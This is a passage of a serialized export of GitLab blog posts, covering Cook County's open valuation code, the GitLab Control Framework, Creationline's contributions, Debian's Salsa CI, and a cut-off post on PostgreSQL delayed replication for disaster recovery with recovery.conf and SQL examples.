that third pillar, we absolutely have to publish\nthe code that we use to value (a) house,” Robert says.\n\n## Modernizing software and viewpoints\n\nThe Assessment Office had a limited number of days to completely replicate the existing data\nformats that were in place from the previously elected office and to create a transparent\nplatform where property owners could understand how their assessment came to be. 
There were other\nchallenges too, such as legacy scripts, the inability to integrate older software, and zero\nassistance from the previous office.\n\nRobert and his team turned to GitLab to publish all of their code on residential modeling.\nThey have four repositories with more than 880 commits, all of which the public is able to access.\n“We’re using GitLab completely differently. Our product is your tax assessment and we have to\ndeploy the product on time because if we don’t, the entire government falls apart,” Robert says.\n“We will make mistakes and we have to document those mistakes so that we can be transparent and\ndo our jobs as well as we can.”\n\n## Creating radical policy shifts with transparency\n\nThe ability for property owners to access and own the information that creates their estate value\nhas never been done before at this level. “No county assessor has ever used a public-facing\nrepository for their work,” Robert says. In fact, establishing governing policies has customarily\nbeen done behind closed doors. Cook County has taken an experimental step towards open source\ngovernment policies. “Very few government agencies do it,” he says.\n\nThe Cook County office doesn’t want to stop there. This is just the first step in what it hopes\nare future electoral victories. “We need to demonstrate that transparency is ‘good politics’…\nif transparency becomes a successful evolutionary trait among politicians, you get more of it.”\n\nWant to hear about how Robert and the Cook County Assessment Office use GitLab? 
Watch his\npresentation in its entirety here:\n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/K8ROmhwphMg\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\nCover image by [Element5 Digital](https://unsplash.com/@element5digital) on [Unsplash](https://unsplash.com)\n{: .note}\n",[910,267,9],{"slug":1684,"featured":6,"template":689},"creating-a-transparent-digital-democracy","content:en-us:blog:creating-a-transparent-digital-democracy.yml","Creating A Transparent Digital Democracy","en-us/blog/creating-a-transparent-digital-democracy.yml","en-us/blog/creating-a-transparent-digital-democracy",{"_path":1690,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1691,"content":1697,"config":1704,"_id":1706,"_type":14,"title":1707,"_source":16,"_file":1708,"_stem":1709,"_extension":19},"/en-us/blog/creating-the-gitlab-controls-framework",{"title":1692,"description":1693,"ogTitle":1692,"ogDescription":1693,"noIndex":6,"ogImage":1694,"ogUrl":1695,"ogSiteName":673,"ogType":674,"canonicalUrls":1695,"schema":1696},"Adobe CCF becomes GitLab's open source control framework","We've implemented and adapted an open source compliance framework. 
Now we're sharing our process and tools so you can adapt and customize it too.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749683200/Blog/Hero%20Images/geraldo-stanislas-unsplash.jpg","https://about.gitlab.com/blog/creating-the-gitlab-controls-framework","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Turning the Adobe CCF into the GitLab Control Framework (it's all open source!)\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Jeff Burrows\"}],\n        \"datePublished\": \"2019-07-10\",\n      }",{"title":1698,"description":1693,"authors":1699,"heroImage":1694,"date":1701,"body":1702,"category":865,"tags":1703},"Turning the Adobe CCF into the GitLab Control Framework (it's all open source!)",[1700],"Jeff Burrows","2019-07-10","\nIn my previous blog post, I talked about [how GitLab went about choosing an overarching compliance framework](/blog/choosing-a-compliance-framework/) that would optimize satisfying the requirements of underlying regulatory or industry best practice requirements. Today I’m blogging about the next steps in that process, and will walk through how we implemented the [Adobe open source compliance framework (CCF)](https://blogs.adobe.com/security/2017/05/open-source-ccf.html) and adapted it to our needs, resulting in the GitLab Control Framework (GCF).\n\n## Implementation and adaptation\n\nWhen you download the Adobe CCF you get two PDF documents: a whitepaper on the state of compliance at Adobe and a table of all the generic CCF controls. The first thing we did was to convert the CCF controls PDF to a CSV so we could more easily make changes to the data. Most of these changes were to make the control statements specific to GitLab and our compliance needs.\n\nWe were careful when making changes to ensure that we weren't changing anything foundational about the statement, as this could break the mapping to underlying requirements. 
For example, [PCI DSS](https://www.pcisecuritystandards.org/documents/ASV_Program_Guide_v3.0.pdf) states that an organization must “run internal and external network vulnerability scans at least quarterly and after any significant change in the network (such as new system component installations, changes in network topology, firewall rule modifications, product upgrades).” If you were to make the frequency of the [Vulnerability Scans control](/handbook/security/security-assurance/security-compliance/guidance/vulnerability-and-patch-management.html#controls) “annual” instead of “quarterly,” that control would no longer map to PCI DSS control 11.2 since that underlying PCI control requires at least quarterly scanning.\n\n### Now we have a set of security controls specific to GitLab’s compliance needs\n\nWe found it helpful to create a prefix for each domain (e.g. AM for Asset Management, BC for Business Continuity, etc.) of controls and use these to create control numbers for each control (e.g. AM.1.01, BC.1.04, etc.). With this information in place, the real fun started.\n\nThere are 184 default controls. This number will expand or contract based on your individual needs. For example, if you have a need for FedRamp certification you might have different control requirements than an organization that doesn't. This is a lot of controls to try and roll out all at once, and most organizations don’t need to address all of the underlying control frameworks simultaneously. At GitLab, we knew that a SOC2 certification was the first compliance priority for us and, based on these needs, we started by prioritizing all controls that mapped to SOC2’s Common Criteria. This gave us a list of 63 controls – a much more manageable starting point.\n\nFor these 63 controls we wanted to build out additional content relating to each. 
In particular, we wanted a Markdown file that addressed each of the following topics for each control:\n\n* Control Statement\n* Context\n* Scope\n* Ownership\n* Implementation Guidance\n* Reference Links\n* Examples of evidence an auditor might request to satisfy this control\n* Framework Mapping\n\nMost of this information can be seen within the [security control pages in our handbook](/handbook/security/security-assurance/security-compliance/sec-controls.html); however, some of these topics contain sensitive information so we have a repo only accessible to GitLab team members.\n\n### The last steps in this implementation process were to:\n\n1. Identify the teams within GitLab that were responsible, accountable, consulted, and informed for each of our 63 prioritized controls, and then\n2. Perform a gap analysis for each of these controls to see what our starting point was for each, in terms of our state of compliance.\n\nThe above steps each build on the previous ones, and help to ensure enough baseline context and requirements were established and that we understood the context and scope for each control sufficiently to perform the gap analysis.\n\n## Adopting the GCF and future plans\n\nOur goal in sharing the details behind our compliance framework implementation is to lessen the adoption effort for smaller companies and GitLab customers alike. We’ve created a [public repo that has a copy of the csv file we adapted from the Adobe CCF](https://gitlab.com/gitlab-com/gl-security/public-gcf) and a link to a view-only [Google Sheet with all of these controls and variables in place](https://docs.google.com/spreadsheets/d/1xmACTt5WD_u8OL0z8G0oUv7Di9J4DWHuy2kamch_7-g/edit#gid=907478311) to make adaptation to your organization as easy as possible.\n\nWe’re currently working on scripts that turn SOC2 and HIPAA-related controls into individual issues within a GitLab project. 
We’re also working on a CSV-to-JSON tool that would easily convert the control CSV into a large data blob, making deployment for certain organizations easier.\n\n**We plan to make these tools available as they are ready but we also want to hear from you.** *What features would make the adoption of these controls easier? How are you using GitLab to help with your compliance needs? What else can GitLab contribute to the security compliance industry to help companies of all sizes align with security best practices and reduce the effort needed for external security validations/certifications?* **Leave us a comment below!**\n\nPhoto by [geraldo stanislas](https://unsplash.com/@pixelsucker?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText) on Unsplash\n{: .note}\n",[9,865],{"slug":1705,"featured":6,"template":689},"creating-the-gitlab-controls-framework","content:en-us:blog:creating-the-gitlab-controls-framework.yml","Creating The Gitlab Controls Framework","en-us/blog/creating-the-gitlab-controls-framework.yml","en-us/blog/creating-the-gitlab-controls-framework",{"_path":1711,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1712,"content":1717,"config":1722,"_id":1724,"_type":14,"title":1725,"_source":16,"_file":1726,"_stem":1727,"_extension":19},"/en-us/blog/creationline-post",{"title":1713,"description":1714,"ogTitle":1713,"ogDescription":1714,"noIndex":6,"ogImage":1192,"ogUrl":1715,"ogSiteName":673,"ogType":674,"canonicalUrls":1715,"schema":1716},"Meet Creationline team members who contribute to GitLab","Creationline contributes to GitLab as a reseller. 
Three team members explain how it works.","https://about.gitlab.com/blog/creationline-post","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Meet Creationline team members who contribute to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-11-27\",\n      }",{"title":1713,"description":1714,"authors":1718,"heroImage":1192,"date":1013,"body":1719,"category":10,"tags":1720},[704],"\nFor this edition of the [GitLab contributor blog posts](/blog/tags.html#contributors), I'm\nexcited to introduce Creationline, which is a [GitLab reseller in Japan](/resellers/creationline/). As you read this blog post, you will find Creationline is not a typical reseller. Their team was able to help both their customers and the GitLab community through their contributions. Here's what three Creationline employees had to share with us. \n\n## Decision to partner with GitLab and contributing as a reseller\n#### [Jean-Baptiste Vasseur](https://gitlab.com/jvasseur), Agile Coach and DevOps Consultant \n\nWhen we explored the [DevOps](/topics/devops/) landscape about 3 years ago, we accidentally came across [GitLab’s handbook](/handbook/). This was a revelation for us! Pushing transparency to a point where job applicants know how GitLab members are expected to behave with candidates, a company culture where people are not afraid to communicate their failures, published company business targets and how the team is planning to achieve them, and of course how an open source software philosophy applied to every aspect of GitLab. 
We felt connected to so many aspects of GitLab’s company culture that I wanted to find a way to work together.\n\nAs [Creationline](http://www.creationline.com/gitlab) was already reselling licenses for other cloud and DevOps companies, and as GitLab was looking for more partners in different countries at that time, we felt confident we had a very good match and started distributing GitLab licenses in June, 2017.\n\nI usually invest a lot of my time prospecting clients, providing technical and value chain consulting, and contributing to the local community by co-organizing meetups and delivering CI/CD workshops. While I also love writing code – I come from an engineering background – it's a challenge to find the time to make open source contributions. However, while I was consulting for a large IT firm that was developing an internal DevOps package built around GitLab, I had an opportunity to make a valuable contribution to GitLab on the company's behalf. The team had a lot of passion for the project and loved working with the GitLab product, but they got blocked by a missing API and were not comfortable enough with their English to open a merge request.\n\nAs consultants, we did not have the responsibility of adding features or fixing issues on GitLab, but I really wanted to help our client. I explored the source code, figured out the pattern/coding style, and opened my first [merge request](https://gitlab.com/gitlab-org/gitlab-foss/merge_requests/22296). 
Review happened almost immediately, and GitLab team members were very nice and also challenged me to apply some refactoring, which helped me learn even more about the source code.\n\n![Open Source Summit Japan, 2019](https://about.gitlab.com/images/blogimages/creationline-blogpost/Creationline-OSS-Japan.jpg){: .shadow.medium.center}\nCreationline and GitLab team members at Open Source Summit-Japan\n{: .note.text-center}\n\n## Journey from an end user to a regular contributor to an evangelist\n#### [Hiroyuki Sato](https://gitlab.com/hiroponz), GitLab Evangelist\n\nI started to contribute to GitLab back in 2012. At that time I was already using GitLab at work, and I wanted to fix a bug that I was facing. This issue was preventing the source code diff from being displayed on the screen, but it was only occurring when using Japanese. As this issue was not seen in other languages, this was not a high priority bug, but it was impacting us severely. I found it very natural to fix it myself and to open a [merge request](https://github.com/gitlabhq/gitlabhq/pull/2100). In order to solve this, I also had to first fix the gem ‘grit_ext’ that GitLab was using, and created [another merge request](https://github.com/gitlabhq/grit_ext/pull/1).\n\nBoth merge requests got reviewed and merged within three days! This experience was so exciting that I started to contribute more and created [multiple merge requests](https://github.com/gitlabhq/gitlabhq/pulls?q=is%3Apr+author%3Ahiroponz+is%3Aclosed), and eventually I was awarded the [MVP](https://about.gitlab.com/community/mvp/) for GitLab's 5.1 release.\n\nLater on, as I really loved GitLab as a product, I started to explore if there was a way for me to work more closely with GitLab. 
This is when I met Creationline, which had just become the exclusive reseller in Japan and I decided to join them in April, 2018.\n\nNow, I am involved in pre-sales, marketing, customer support, and I also offer trainings on how to get the best out of GitLab. Of course, I still invest a part of my time to [contribute to GitLab](https://gitlab.com/groups/gitlab-org/-/merge_requests?%0Ascope=all&utf8=%E2%9C%93&state=merged&author_username=hiroponz) to help customers overcome issues/challenges, and this is one of my favorite parts of the job!\n\n## Dogfooding at Creationline\n#### [Yuko Takano](https://gitlab.com/takano_cl), Customer Success Manager\n\nAs a reseller team, we wanted to have more opportunities to use GitLab on a daily basis so we can support our customers better. We also wanted to experience the continuous server side operations, and set up our own instance so that we can capitalize on this experience.\n\nWe started using GitLab inside the GitLab reseller team, and then expanded it to various business functions within our organization. 
We now use a lot of GitLab features in order to manage source code, visualize our sales and marketing workflow, track translation work, organize OKRs with epics, and we continue to look for other areas to explore.\n\n![GitLab CI workshop](https://about.gitlab.com/images/blogimages/creationline-blogpost/Creationlin-GitLab-workshop.jpg){: .shadow.medium.center}\nCreationline team running the GitLab CI Workshop\n{: .note.text-center}\n\n## Interested in learning how you can contribute?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can\nlearn how you can contribute to GitLab's code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n",[267,9,708,1721],"releases",{"slug":1723,"featured":6,"template":689},"creationline-post","content:en-us:blog:creationline-post.yml","Creationline Post","en-us/blog/creationline-post.yml","en-us/blog/creationline-post",{"_path":1729,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1730,"content":1736,"config":1742,"_id":1744,"_type":14,"title":1745,"_source":16,"_file":1746,"_stem":1747,"_extension":19},"/en-us/blog/debian-customizes-ci-tooling-with-gitlab",{"title":1731,"description":1732,"ogTitle":1731,"ogDescription":1732,"noIndex":6,"ogImage":1733,"ogUrl":1734,"ogSiteName":673,"ogType":674,"canonicalUrls":1734,"schema":1735},"Debian customizes CI tooling with GitLab","Debian developer Santiago Ruano Rincón explains the Linux distribution's custom solution for improving and expediting the open source software packaging process.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663000/Blog/Hero%20Images/tanukilifecycle.png","https://about.gitlab.com/blog/debian-customizes-ci-tooling-with-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Debian customizes CI tooling with GitLab\",\n        \"author\": 
[{\"@type\":\"Person\",\"name\":\"Santiago Ruano Rincón\"}],\n        \"datePublished\": \"2023-09-19\",\n      }",{"title":1731,"description":1732,"authors":1737,"heroImage":1733,"date":1739,"body":1740,"category":10,"tags":1741},[1738],"Santiago Ruano Rincón","2023-09-19","\nI still remember the day I broke a widely used critical tool for open source developers around the world.\nAs part of the [Debian Linux distribution project](https://www.debian.org/), I maintain [grep](https://tracker.debian.org/pkg/grep), the GNU/Linux application used to search for text patterns in files.\nI had just uploaded a new Debian release of grep to the Debian archive, when some hours later, a Debian friend called me to let me know other Debian developers were unable to boot their personal computers.\n\nThat was late in 2005 – ever since then I'd wished for a way to prevent that scenario from happening again.\n\nToday, that solution exists.\nIt's part of Salsa, Debian's GitLab implementation, which powers Debian development for more than 900 developers in the global Debian community.\nThanks to GitLab's robust CI/CD functionality, those developers are able to test their packages *before* releasing them to the public Debian archive — saving them from causing the kind of turmoil I accidentally caused.\n\n> [Join us at Open Source Summit Europe 2023](https://go.gitlab.com/dPQ92t) to learn more about GitLab's dedication to open source.\n\nIn this article, I'll explain how that tool, called [Salsa CI](https://salsa.debian.org/salsa-ci-team/pipeline/), helps Debian developers using GitLab streamline software development, accelerate package maintenance, and significantly reduce time-consuming re-work.\n\n## Debian with extra Salsa\nSalsa CI is one of the Debian community's custom-built continuous integration tools.\nIt's part of the Debian GitLab instance ([Salsa](https://wiki.debian.org/Salsa)), and helps Debian maintainers manage roughly [9,000 
projects](https://codesearch.debian.net/search?q=pipeline-jobs+path%3Adebian%2F.*.yml&literal=0&perpkg=1).\n\n### How Salsa CI works\nAs a Linux distribution, Debian packages open source software from multiple upstream sources. \nWhen new upstream source code is released, maintainers can test that code to ensure it will build and run reliably for Debian users as part of the Debian release cycle.\n* Packages appear first in [Debian Unstable](https://wiki.debian.org/DebianUnstable).\n* If those packages don't introduce regressions or serious bugs, they can migrate to [Debian Testing](https://wiki.debian.org/DebianTesting).\n* When a new Debian release is published, those packages move to [Debian Stable](https://wiki.debian.org/DebianStable).\n\nSalsa CI helps increase the probability that packages can pass from Unstable to Testing reliably, quickly, and without issue.\nIn effect, it emulates the Debian build process, adding several quality checks to identify errors before they would affect Debian users. 
\nWhen new source code triggers a Salsa CI pipeline, 17 different jobs run to build and test it automatically.\nSalsa CI checks to see whether the to-be-uploaded packages build on multiple architectures (at the moment, amd64 and i386, and optionally on Arm), runs [autopkgtest test suites](https://wiki.debian.org/ContinuousIntegration/autopkgtest) to try to identify potential regressions, and checks for common errors with our custom linter, [lintian](https://wiki.debian.org/Lintian), among other tests.\nYou can view all the details at Debian's public GitLab instance (I maintain the `grep` package for Debian, so I'll offer that one as [an example of Salsa CI in action](https://salsa.debian.org/debian/grep/-/pipelines/576674)).\n\n![An overview of Salsa CI running on Debian's grep package](https://about.gitlab.com/images/blogimages/debian-grep-salsa-overview.png){: .shadow}\n\n## Life before Salsa CI\nMaintainers have been iterating on the Salsa CI pipeline for more than four years now. \nBut I have not forgotten what life as a package maintainer in the Debian community was like without it.\n\nMost of the work Salsa CI performs today is work that community members would otherwise need to perform manually. \nSo it proceeded slowly and was prone to more errors.\nWhile use of Salsa CI isn't compulsory for Debian maintainers, many choose to use it for their work because it saves them an incredible amount of time and effort — and because it leads to fewer breaking packages.\nMaintainers no longer need to run their own package tests locally; instead, Salsa performs this work remotely.\n\nAnd it works quickly.\nIdentifying issues with [Debian's primary CI system](https://ci.debian.net) when testing packages might require several hours, days, or even a month. \nSalsa CI reduces that time horizon to several *minutes* (or hours, in the worst cases), depending on the complexity of the package. 
For example:\n* Without Salsa CI, maintainers manually upload their packages and must wait for build results from the Debian build network (and they must do this for each architecture they wish to test). Usually, if a build fails, maintainers test on bespoke \"[porterboxes](https://wiki.debian.org/PorterBoxHowToUse)\" tailored to specific architectures. Using Salsa CI, however, maintainers can test x86 and Arm package builds easily — after a single `git push` command.\n\n* Running `autopkgtest` on [ci.debian.net](https://ci.debian.net/) (the official and central CI infrastructure for Debian) tests only the packages that have been built by the build servers and installed in the archive. `autopkgtest` is run for migration reference monthly. In Salsa CI, however, `autopkgtest` runs immediately after the amd64 build job has finished, decreasing review cycle times.\n\n## Salsa CI in the open source ecosystem\nOverall, the Debian community has been pleased with the progress Salsa CI maintainers have made since the tool's creation four years ago.\nOther open source communities are taking notice, too.\nFor instance, Salsa CI has become the basis for even more complex CI pipelines in projects like [Kali Linux](https://go.gitlab.com/G1XROS).\nWe're delighted to see that something we created to solve our own issues and improve our own work is making a positive impact on the open source ecosystem more broadly.\n\n*Editor's note: Debian developers [Alexander Wirt](https://gitlab.com/formorer) and [Otto Kekäläinen](https://gitlab.com/ottok) contributed to this article.*\n\n[Join us at Open Source Summit Europe 2023](https://go.gitlab.com/dPQ92t) to learn more about GitLab's dedication to open source.\n{: .note}\n",[9,267,1099],{"slug":1743,"featured":6,"template":689},"debian-customizes-ci-tooling-with-gitlab","content:en-us:blog:debian-customizes-ci-tooling-with-gitlab.yml","Debian Customizes Ci Tooling With 
Gitlab","en-us/blog/debian-customizes-ci-tooling-with-gitlab.yml","en-us/blog/debian-customizes-ci-tooling-with-gitlab",{"_path":1749,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":1750,"content":1756,"config":1762,"_id":1764,"_type":14,"title":1765,"_source":16,"_file":1766,"_stem":1767,"_extension":19},"/en-us/blog/delayed-replication-for-disaster-recovery-with-postgresql",{"title":1751,"description":1752,"ogTitle":1751,"ogDescription":1752,"noIndex":6,"ogImage":1753,"ogUrl":1754,"ogSiteName":673,"ogType":674,"canonicalUrls":1754,"schema":1755},"How we used delayed replication for disaster recovery with PostgreSQL","Replication is no backup. Or is it? Let's take a look at delayed replication and how we used it to recover from accidental label deletion.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749683349/Blog/Hero%20Images/mathew-schwartz-397471-unsplash.jpg","https://about.gitlab.com/blog/delayed-replication-for-disaster-recovery-with-postgresql","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"How we used delayed replication for disaster recovery with PostgreSQL\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Andreas Brandl\"}],\n        \"datePublished\": \"2019-02-13\",\n      }",{"title":1751,"description":1752,"authors":1757,"heroImage":1753,"date":1759,"body":1760,"category":801,"tags":1761},[1758],"Andreas Brandl","2019-02-13","\nThe [infrastructure team](/handbook/engineering/infrastructure/) at GitLab is responsible for the operation of [GitLab.com](https://gitlab.com/), the largest GitLab instance in existence: With about 3 million users and nearly 7 million projects, it is one of the largest single-tenancy, open source SaaS sites on the internet. 
The PostgreSQL database system is a critical part of the infrastructure that powers GitLab.com and we employ various strategies to provide resiliency against all kinds of data-loss-inducing disasters. Those are highly unlikely of course, but we are well prepared with backup and replication mechanisms to recover from these scenarios.\n\nIt's a misconception to think of replication as a means to back up a database ([see below](#summing-up)). However, in this post, we're going to explore the power of delayed replication to recover data after an accidental deletion: On [GitLab.com](https://gitlab.com), a user [deleted a label](https://gitlab.com/gitlab-com/gl-infra/production/issues/509) for the [`gitlab-ce`](https://gitlab.com/gitlab-org/gitlab-ce/) project, thereby also losing the label's association with merge requests and issues.\n\nWith a delayed replica in place, we were able to recover and restore that data in under 90 minutes. We'll look into that process and how delayed replication helped to achieve this.\n\n### Point-in-time recovery with PostgreSQL\n\nPostgreSQL comes with a built-in feature to recover the state of a database to a certain point in time. This is called *[Point-in-Time Recovery](https://www.postgresql.org/docs/current/continuous-archiving.html)* (PITR), which leverages the same mechanics that are used to keep a replica up to date: Starting from a consistent snapshot of the whole database cluster (a *basebackup*), we apply the sequence of changes to the database state until a certain point in time has been reached.\n\nIn order to use this feature for a cold backup, we regularly take a basebackup of the database and store this in the *archive* (at GitLab, we keep the archive in [Google Cloud Storage](https://cloud.google.com/storage/)). Additionally, we keep track of changes to the database state by archiving the [*write-ahead log*](https://www.postgresql.org/docs/current/wal-intro.html) (WAL). 
With that in place, we can perform PITR to recover from a disaster: Start with a snapshot that was taken before the disaster happened and apply changes from the WAL archive until right before the disastrous event.\n\n### What is delayed replication?\n\n*Delayed replication* is the idea of applying time-delayed changes from the WAL. That is, a transaction that is committed at physical time `X` is only going to be visible on a replica with delay `d` at time `X + d`.\n\nFor PostgreSQL, there are two ways of setting up a physical replica of the database: *Archive recovery* and *streaming replication*. [Archive recovery](https://www.postgresql.org/docs/11/archive-recovery-settings.html) essentially works like PITR but in a continuous way: We keep retrieving changes from the WAL archive and apply them to the replica state in a continuous fashion. On the other hand, [streaming replication](https://wiki.postgresql.org/wiki/Streaming_Replication) directly retrieves the WAL stream from an upstream database host. We prefer archive recovery for delayed replication because it is simpler to manage and delivers an adequate level of performance to keep up with the production cluster.\n\n### How to set up delayed archive recovery\n\nConfiguration of [recovery options](https://www.postgresql.org/docs/11/recovery-config.html) mostly go into `recovery.conf`. Here's an example:\n\n```\nstandby_mode = 'on'\nrestore_command = '/usr/bin/envdir /etc/wal-e.d/env /opt/wal-e/bin/wal-e wal-fetch -p 4 \"%f\" \"%p\"'\nrecovery_min_apply_delay = '8h'\nrecovery_target_timeline = 'latest'\n```\n\nWith these settings in place, we have configured a delayed replica with archive recovery. It uses [wal-e](https://github.com/wal-e/wal-e) to retrieve WAL segments (`restore_command`) from the archive and delays application of changes by eight hours (`recovery_min_apply_delay`). The replica is going to follow any timeline switches present in the archive, e.g. 
caused by a failover in the cluster (`recovery_target_timeline`).\n\nIt is possible to configure streaming replication with a delay using `recovery_min_apply_delay`. However, there are a few pitfalls regarding replication slots, hot standby feedback, and others that one needs to be aware of. In our case, we avoid them by replicating from the WAL archive instead of using streaming replication.\n\nIt is worth noting that `recovery_min_apply_delay` was only introduced in PostgreSQL 9.4. However, in previous versions, a delayed replica is typically implemented with a combination of [recovery management functions](https://www.postgresql.org/docs/9.3/functions-admin.html) (`pg_xlog_replay_pause(), pg_xlog_replay_resume()`) or by withholding WAL segments from the archive for the duration of the delay.\n\n### How does PostgreSQL implement it?\n\nIt is particularly interesting to see how PostgreSQL implements delayed recovery. So let's look at [`recoveryApplyDelay(XlogReaderState)`](https://gitlab.com/postgres/postgres/blob/c24dcd0cfd949bdf245814c4c2b3df828ee7db36/src/backend/access/transam/xlog.c#L6124) below. It is called from the [main redo apply loop](https://gitlab.com/postgres/postgres/blob/c24dcd0cfd949bdf245814c4c2b3df828ee7db36/src/backend/access/transam/xlog.c#L7196) for each record read from WAL.\n\n```c\nstatic bool\nrecoveryApplyDelay(XLogReaderState *record)\n{\n\tuint8\t\txact_info;\n\tTimestampTz xtime;\n\tlong\t\tsecs;\n\tint\t\t\tmicrosecs;\n\n\t/* nothing to do if no delay configured */\n\tif (recovery_min_apply_delay \u003C= 0)\n\t\treturn false;\n\n\t/* no delay is applied on a database not yet consistent */\n\tif (!reachedConsistency)\n\t\treturn false;\n\n\t/*\n\t * Is it a COMMIT record?\n\t *\n\t * We deliberately choose not to delay aborts since they have no effect on\n\t * MVCC. 
We already allow replay of records that don't have a timestamp,\n\t * so there is already opportunity for issues caused by early conflicts on\n\t * standbys.\n\t */\n\tif (XLogRecGetRmid(record) != RM_XACT_ID)\n\t\treturn false;\n\n\txact_info = XLogRecGetInfo(record) & XLOG_XACT_OPMASK;\n\n\tif (xact_info != XLOG_XACT_COMMIT &&\n\t\txact_info != XLOG_XACT_COMMIT_PREPARED)\n\t\treturn false;\n\n\tif (!getRecordTimestamp(record, &xtime))\n\t\treturn false;\n\n\trecoveryDelayUntilTime =\n\t\tTimestampTzPlusMilliseconds(xtime, recovery_min_apply_delay);\n\n\t/*\n\t * Exit without arming the latch if it's already past time to apply this\n\t * record\n\t */\n\tTimestampDifference(GetCurrentTimestamp(), recoveryDelayUntilTime,\n\t\t\t\t\t\t&secs, &microsecs);\n\tif (secs \u003C= 0 && microsecs \u003C= 0)\n\t\treturn false;\n\n\twhile (true)\n\t{\n        // Shortened:\n        // Use WaitLatch until we reached recoveryDelayUntilTime\n        // and then\n        break;\n\t}\n\treturn true;\n}\n```\n\nThe takeaway here is that the delay is based on the physical time that was recorded with the commit timestamp of the transaction (`xtime`). We can also see that the delay is only applied to commit records but not to other types of records: Any data changes are directly applied but the corresponding commit is delayed, so these changes only become visible after the configured delay.\n\n### How to use a delayed replica to recover data\n\nLet's say we have a production database cluster and a replica with eight hours of delay. How do we use this to recover data? 
Let's look at how this worked in the case of the [accidental label deletion](https://gitlab.com/gitlab-com/gl-infra/production/issues/509).\n\nAs soon as we were aware of the incident, we [paused archive recovery](https://www.postgresql.org/docs/9.3/functions-admin.html) on the delayed replica:\n\n```sql\nSELECT pg_xlog_replay_pause();\n```\n\nPausing the replica eliminated the risk of the replica replaying the `DELETE` query. This is useful if you need more time to investigate.\n\nThe recovery approach is to let the delayed replica catch up until right before the point the `DELETE` query occurred. In our case we knew roughly the physical time of the `DELETE` query. We removed `recovery_min_apply_delay` and added `recovery_target_time` to `recovery.conf`. This effectively lets the replica catch up as fast as possible (no delay) until a certain point in time:\n\n```\nrecovery_target_time = '2018-10-12 09:25:00+00'\n```\n\nWhen operating with physical timestamps, it's worth adding a little margin for error. Obviously, the bigger the margin, the bigger the data loss. On the other hand, if the replica recovers beyond the actual incident timestamp it also replays the `DELETE` query and we would have to start over (or worse: use a cold backup to perform PITR).\n\nAfter restarting the delayed Postgres instance, we saw a lot of WAL segments being replayed until the target transaction time was reached. In order to get a sense of the progress during this phase, we can use this query:\n\n```sql\nSELECT\n  -- current location in WAL\n  pg_last_xlog_replay_location(),\n  -- current transaction timestamp (state of the replica)\n  pg_last_xact_replay_timestamp(),\n  -- current physical time\n  now(),\n  -- the amount of time still to be applied until recovery_target_time has been reached\n  '2018-10-12 09:25:00+00'::timestamptz - pg_last_xact_replay_timestamp() as delay;\n```\n\nWe know recovery is complete when the replay timestamp does not change any more. 
We can consider setting a [`recovery_target_action`](https://www.postgresql.org/docs/11/recovery-target-settings.html) in order to shut down, promote or pause the instance once replay has completed (the default is to pause).\n\nThe database is now in the state preceding the disastrous query. We can start to export data or otherwise make use of the database. In our case, we exported information about the label that was deleted and its association with issues and merge requests and imported that data into our production database. In other cases with more severe data loss, it can be favorable to promote the replica and continue to use it as a primary. However this means that we lose any data that was entered into the database after the point in time we recovered to.\n\nA more precise alternative to using physical timestamps for targeted recovery is using transaction ids. It is good practice to log transaction ids for e.g. DDL statements (like `DROP TABLE`) using `log_statements = 'ddl'`. If we had a transaction id at hand, we could have used `recovery_target_xid` instead in order to replay to the transaction that preceded the `DELETE` query.\n\nFor the delayed replica, the way back to normal is simple: Revert changes to `recovery.conf` and restart Postgres. After a while, the replica is going to show a delay of eight hours again – ready for any future disasters.\n\n### Benefits for recovery\n\nThe major benefit from a delayed replica over using a cold backup is that it eliminates the step of restoring a full snapshot from the archive. This can easily take hours, depending on network and storage speeds. In our case, it takes roughly five hours to retrieve the full ~2TB basebackup from the archive. In addition to that, we would have to apply 24 hours' worth of WAL in order to recover to the desired state (in the worst case).\n\nWith a delayed replica in place, we get two benefits over a cold backup:\n\n1. No need to retrieve a full basebackup from the archive and\n2. 
we have a *fixed* window of eight hours' worth of WAL that needs to be replayed to catch up.\n\nIn addition to that, we continuously test our ability to perform PITR from the WAL archive and would quickly realize WAL archive corruption or other WAL-related problems by monitoring the lag of the delayed replica.\n\nIn our example case, completing recovery took 50 minutes and translated to a recovery rate of 110 GB worth of WAL per hour (the archive was still on [AWS S3](https://aws.amazon.com/s3/) at that time). The incident was mitigated and data recovered and restored 90 minutes after work was started.\n\n### Summing up: Where delayed replication can be useful (and where it's not)\n\nDelayed replication can be used as a first resort to recover from accidental data loss and lends itself perfectly to situations where the loss-inducing event is noticed within the configured delay.\n\nLet's be clear though: *Replication is not a backup mechanism*.\n\nBackup and replication are two mechanisms with distinct purposes: A *cold backup* is useful to recover from a disaster, for example an accidental `DELETE` or `DROP TABLE` event. In this case, we utilize a backup from cold storage to restore an earlier state of a table or the whole database. On the other hand, a `DROP TABLE` query replicates nearly instantly to all replicas in a running cluster – hence normal replication on its own is not useful to recover from this scenario. Instead, the purpose of *replication* is mostly to guard database availability against failures of individual database servers and to distribute load.\n\nEven with a delayed replica in place, there are situations where we really want a cold backup that is stored in a safe place: data center failures, silent corruption, or other events that aren't visible 